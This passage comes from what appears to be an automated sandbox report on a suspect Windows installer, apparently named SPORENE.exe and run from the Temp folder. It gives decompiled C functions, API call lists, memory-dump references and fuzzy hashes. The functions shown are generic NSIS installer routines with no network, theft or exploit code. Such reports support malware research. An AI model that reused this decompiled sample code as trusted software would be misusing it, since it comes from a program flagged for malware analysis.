                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                				intOrPtr _t65;
                				intOrPtr _t66;
                				intOrPtr _t72;
                				void* _t76;
                				void* _t79;
                
                				_t72 = __edx;
                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                				_t65 = 2;
                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                				_t66 = E00402D84(_t65);
                				_t79 = _t66 - 1;
                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                				if(_t79 < 0) {
                					L36:
                					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                				} else {
                					__ecx = 0x3ff;
                					if(__eax > 0x3ff) {
                						 *(__ebp - 0x44) = 0x3ff;
                					}
                					if( *__edi == __bx) {
                						L34:
                						__ecx =  *(__ebp - 0xc);
                						__eax =  *(__ebp - 8);
                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                						if(_t79 == 0) {
                							 *(_t76 - 4) = 1;
                						}
                						goto L36;
                					} else {
                						 *(__ebp - 0x38) = __ebx;
                						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                						if( *(__ebp - 0x44) > __ebx) {
                							do {
                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                										__eax = __ebp - 0x50;
                										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                											goto L34;
                										} else {
                											goto L21;
                										}
                									} else {
                										goto L34;
                									}
                								} else {
                									__eax = __ebp - 0x40;
                									_push(__ebx);
                									_push(__ebp - 0x40);
                									__eax = 2;
                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                									if(__eax == 0) {
                										goto L34;
                									} else {
                										__ecx =  *(__ebp - 0x40);
                										if(__ecx == __ebx) {
                											goto L34;
                										} else {
                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                											 *(__ebp - 0x4c) = __ecx;
                											 *(__ebp - 0x50) = __eax;
                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                												L28:
                												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                											} else {
                												__ebp - 0x50 = __ebp + 0xa;
                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                													L21:
                													__eax =  *(__ebp - 0x50);
                												} else {
                													__edi =  *(__ebp - 0x4c);
                													__edi =  ~( *(__ebp - 0x4c));
                													while(1) {
                														_t22 = __ebp - 0x40;
                														 *_t22 =  *(__ebp - 0x40) - 1;
                														__eax = 0xfffd;
                														 *(__ebp - 0x50) = 0xfffd;
                														if( *_t22 == 0) {
                															goto L22;
                														}
                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                														__edi = __edi + 1;
                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                														__eax = __ebp + 0xa;
                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                															continue;
                														} else {
                															goto L21;
                														}
                														goto L22;
                													}
                												}
                												L22:
                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                													goto L28;
                												} else {
                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                														} else {
                															__ecx =  *(__ebp - 0xc);
                															__edx =  *(__ebp - 8);
                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                														}
                														goto L34;
                													} else {
                														__ecx =  *(__ebp - 0xc);
                														__edx =  *(__ebp - 8);
                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                														 *(__ebp - 0x38) = __eax;
                														if(__ax == __bx) {
                															goto L34;
                														} else {
                															goto L26;
                														}
                													}
                												}
                											}
                										}
                									}
                								}
                								goto L37;
                								L26:
                								__eax =  *(__ebp - 8);
                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                						}
                						goto L34;
                					}
                				}
                				L37:
                				return 0;
                			}








                0x004026ec
                0x004026ee
                0x004026f1
                0x004026f3
                0x004026f6
                0x004026fb
                0x004026ff
                0x00402702
                0x00402705
                0x00402c2a
                0x00402c2d
                0x0040270b
                0x0040270b
                0x00402712
                0x00402714
                0x00402714
                0x0040271a
                0x0040287e
                0x0040287e
                0x00402881
                0x00402886
                0x004015b6
                0x0040292e
                0x0040292e
                0x00000000
                0x00402720
                0x00402721
                0x0040272c
                0x0040272f
                0x0040273b
                0x0040273f
                0x004027d7
                0x004027ef
                0x004027ff
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402745
                0x00402745
                0x00402748
                0x00402749
                0x0040274c
                0x00402751
                0x00402758
                0x00402760
                0x00000000
                0x00402766
                0x00402766
                0x0040276b
                0x00000000
                0x00402771
                0x00402771
                0x00402779
                0x0040277c
                0x0040277f
                0x0040283a
                0x00402841
                0x00402785
                0x0040278b
                0x00402797
                0x00402801
                0x00402801
                0x00402799
                0x00402799
                0x0040279c
                0x0040279e
                0x0040279e
                0x0040279e
                0x004027a1
                0x004027a6
                0x004027a9
                0x00000000
                0x00000000
                0x004027ab
                0x004027ae
                0x004027bc
                0x004027c2
                0x004027d0
                0x00000000
                0x004027d2
                0x00000000
                0x004027d2
                0x00000000
                0x004027d0
                0x0040279e
                0x00402804
                0x00402807
                0x00000000
                0x00402809
                0x0040280e
                0x0040284f
                0x00402871
                0x00402878
                0x0040285d
                0x0040285d
                0x00402860
                0x00402863
                0x00402866
                0x00402866
                0x00000000
                0x00402817
                0x00402817
                0x0040281a
                0x0040281d
                0x00402823
                0x00402827
                0x0040282a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040282a
                0x0040280e
                0x00402807
                0x0040277f
                0x0040276b
                0x00402760
                0x00000000
                0x0040282c
                0x0040282c
                0x0040282f
                0x00402838
                0x00000000
                0x0040272f
                0x0040271a
                0x00402c33
                0x00402c39

                APIs
                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Pointer$ByteCharMultiWide$Read
                • String ID: 9
                • API String ID: 163830602-2366072709
                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040559F(signed int _a4, WCHAR* _a8) {
                				struct HWND__* _v8;
                				signed int _v12;
                				WCHAR* _v32;
                				long _v44;
                				int _v48;
                				void* _v52;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				WCHAR* _t27;
                				signed int _t28;
                				long _t29;
                				signed int _t37;
                				signed int _t38;
                
                				_t27 =  *0x433ee4;
                				_v8 = _t27;
                				if(_t27 != 0) {
                					_t37 =  *0x434fb4;
                					_v12 = _t37;
                					_t38 = _t37 & 0x00000001;
                					if(_t38 == 0) {
                						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                					}
                					_t27 = lstrlenW(0x42c248);
                					_a4 = _t27;
                					if(_a8 == 0) {
                						L6:
                						if((_v12 & 0x00000004) == 0) {
                							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                						}
                						if((_v12 & 0x00000002) == 0) {
                							_v32 = 0x42c248;
                							_v52 = 1;
                							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                							_v44 = 0;
                							_v48 = _t29 - _t38;
                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                						}
                						if(_t38 != 0) {
                							_t28 = _a4;
                							0x42c248[_t28] = 0;
                							return _t28;
                						}
                					} else {
                						_t27 = lstrlenW(_a8) + _a4;
                						if(_t27 < 0x1000) {
                							_t27 = lstrcatW(0x42c248, _a8);
                							goto L6;
                						}
                					}
                				}
                				return _t27;
                			}

















                0x004055a5
                0x004055af
                0x004055b4
                0x004055ba
                0x004055c5
                0x004055c8
                0x004055cb
                0x004055d1
                0x004055d1
                0x004055d7
                0x004055df
                0x004055e2
                0x004055ff
                0x00405603
                0x0040560c
                0x0040560c
                0x00405616
                0x0040561f
                0x0040562b
                0x00405632
                0x00405636
                0x00405639
                0x0040564c
                0x0040565a
                0x0040565a
                0x0040565e
                0x00405660
                0x00405663
                0x00000000
                0x00405663
                0x004055e4
                0x004055ec
                0x004055f4
                0x004055fa
                0x00000000
                0x004055fa
                0x004055f4
                0x004055e2
                0x0040566f

                APIs
                • lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                • String ID:
                • API String ID: 1495540970-0
                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E004067C4(WCHAR* _a4) {
                				short _t5;
                				short _t7;
                				WCHAR* _t19;
                				WCHAR* _t20;
                				WCHAR* _t21;
                
                				_t20 = _a4;
                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                					_t20 =  &(_t20[4]);
                				}
                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                					_t20 =  &(_t20[2]);
                				}
                				_t5 =  *_t20;
                				_t21 = _t20;
                				_t19 = _t20;
                				if(_t5 != 0) {
                					do {
                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                							_t19 = CharNextW(_t19);
                						}
                						_t20 = CharNextW(_t20);
                						_t5 =  *_t20;
                					} while (_t5 != 0);
                				}
                				 *_t19 =  *_t19 & 0x00000000;
                				while(1) {
                					_push(_t19);
                					_push(_t21);
                					_t19 = CharPrevW();
                					_t7 =  *_t19;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t19 =  *_t19 & 0x00000000;
                					if(_t21 < _t19) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}








                0x004067c6
                0x004067cf
                0x004067e6
                0x004067e6
                0x004067ed
                0x004067f9
                0x004067f9
                0x004067fc
                0x004067ff
                0x00406804
                0x00406806
                0x0040680f
                0x00406813
                0x00406830
                0x00406838
                0x00406838
                0x0040683d
                0x0040683f
                0x00406842
                0x00406847
                0x00406848
                0x0040684c
                0x0040684c
                0x0040684d
                0x00406854
                0x00406856
                0x0040685d
                0x00000000
                0x00000000
                0x00406865
                0x0040686b
                0x00000000
                0x00000000
                0x00000000
                0x0040686b
                0x00406870

                APIs
                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                • CharNextW.USER32(?,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                • CharPrevW.USER32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Char$Next$Prev
                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-826357637
                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                				long _v8;
                				signed char _v12;
                				unsigned int _v16;
                				void* _v20;
                				intOrPtr _v24;
                				long _v56;
                				void* _v60;
                				long _t15;
                				unsigned int _t19;
                				signed int _t25;
                				struct HWND__* _t28;
                
                				_t28 = _a4;
                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                				if(_a8 == 0) {
                					L4:
                					_v56 = _t15;
                					_v60 = 4;
                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                					return _v24;
                				}
                				_t19 = GetMessagePos();
                				_v16 = _t19 >> 0x10;
                				_v20 = _t19;
                				ScreenToClient(_t28,  &_v20);
                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                				if((_v12 & 0x00000066) != 0) {
                					_t15 = _v8;
                					goto L4;
                				}
                				return _t25 | 0xffffffff;
                			}














                0x00404e62
                0x00404e6f
                0x00404e75
                0x00404eb3
                0x00404eb3
                0x00404ec2
                0x00404ec9
                0x00000000
                0x00404ecb
                0x00404e77
                0x00404e86
                0x00404e8e
                0x00404e91
                0x00404ea3
                0x00404ea9
                0x00404eb0
                0x00000000
                0x00404eb0
                0x00000000

                APIs
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                • GetMessagePos.USER32 ref: 00404E77
                • ScreenToClient.USER32 ref: 00404E91
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                				short _v132;
                				int _t11;
                				int _t20;
                
                				if(_a8 == 0x110) {
                					SetTimer(_a4, 1, 0xfa, 0);
                					_a8 = 0x113;
                				}
                				if(_a8 == 0x113) {
                					_t20 =  *0x41ea18; // 0x1ffd3
                					_t11 =  *0x42aa24;
                					if(_t20 >= _t11) {
                						_t20 = _t11;
                					}
                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                					SetWindowTextW(_a4,  &_v132);
                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                				}
                				return 0;
                			}






                0x00402fa3
                0x00402fb1
                0x00402fb7
                0x00402fb7
                0x00402fc5
                0x00402fc7
                0x00402fcd
                0x00402fd4
                0x00402fd6
                0x00402fd6
                0x00402fec
                0x00402ffc
                0x0040300e
                0x0040300e
                0x00403016

                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                • MulDiv.KERNEL32(0001FFD3,00000064,?), ref: 00402FDC
                • wsprintfW.USER32 ref: 00402FEC
                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                • SetDlgItemTextW.USER32 ref: 0040300E
                Strings
                • verifying installer: %d%%, xrefs: 00402FE6
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00402950(int __ebx, void* __eflags) {
                				WCHAR* _t26;
                				void* _t29;
                				long _t37;
                				int _t49;
                				void* _t52;
                				void* _t54;
                				void* _t56;
                				void* _t59;
                				void* _t60;
                				void* _t61;
                
                				_t49 = __ebx;
                				_t52 = 0xfffffd66;
                				_t26 = E00402DA6(0xfffffff0);
                				_t55 = _t26;
                				 *(_t61 - 0x40) = _t26;
                				if(E00405E83(_t26) == 0) {
                					E00402DA6(0xffffffed);
                				}
                				E00406008(_t55);
                				_t29 = E0040602D(_t55, 0x40000000, 2);
                				 *(_t61 + 8) = _t29;
                				if(_t29 != 0xffffffff) {
                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                					if( *(_t61 - 0x28) != _t49) {
                						_t37 =  *0x434f14;
                						 *(_t61 - 0x44) = _t37;
                						_t54 = GlobalAlloc(0x40, _t37);
                						if(_t54 != _t49) {
                							E004034E5(_t49);
                							E004034CF(_t54,  *(_t61 - 0x44));
                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                							 *(_t61 - 0x10) = _t59;
                							if(_t59 != _t49) {
                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                								while( *_t59 != _t49) {
                									_t60 = _t59 + 8;
                									 *(_t61 - 0x3c) =  *_t59;
                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                									_t59 = _t60 +  *(_t61 - 0x3c);
                								}
                								GlobalFree( *(_t61 - 0x10));
                							}
                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                							GlobalFree(_t54);
                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                						}
                					}
                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                					CloseHandle( *(_t61 + 8));
                				}
                				_t56 = 0xfffffff3;
                				if(_t52 < _t49) {
                					_t56 = 0xffffffef;
                					DeleteFileW( *(_t61 - 0x40));
                					 *((intOrPtr*)(_t61 - 4)) = 1;
                				}
                				_push(_t56);
                				E00401423();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                				return 0;
                			}













                0x00402950
                0x00402952
                0x00402957
                0x0040295c
                0x0040295f
                0x00402969
                0x0040296d
                0x0040296d
                0x00402973
                0x00402980
                0x00402988
                0x0040298b
                0x00402997
                0x0040299a
                0x004029a0
                0x004029ae
                0x004029b3
                0x004029b7
                0x004029ba
                0x004029c3
                0x004029cf
                0x004029d3
                0x004029d6
                0x004029e0
                0x004029ff
                0x004029ec
                0x004029f4
                0x004029f7
                0x004029fc
                0x004029fc
                0x00402a06
                0x00402a06
                0x00402a13
                0x00402a19
                0x00402a1f
                0x00402a1f
                0x004029b7
                0x00402a33
                0x00402a35
                0x00402a35
                0x00402a3f
                0x00402a40
                0x00402a44
                0x00402a48
                0x00402a4e
                0x00402a4e
                0x00402a55
                0x004022f1
                0x00402c2d
                0x00402c39

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                • GlobalFree.KERNEL32 ref: 00402A06
                • GlobalFree.KERNEL32 ref: 00402A19
                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
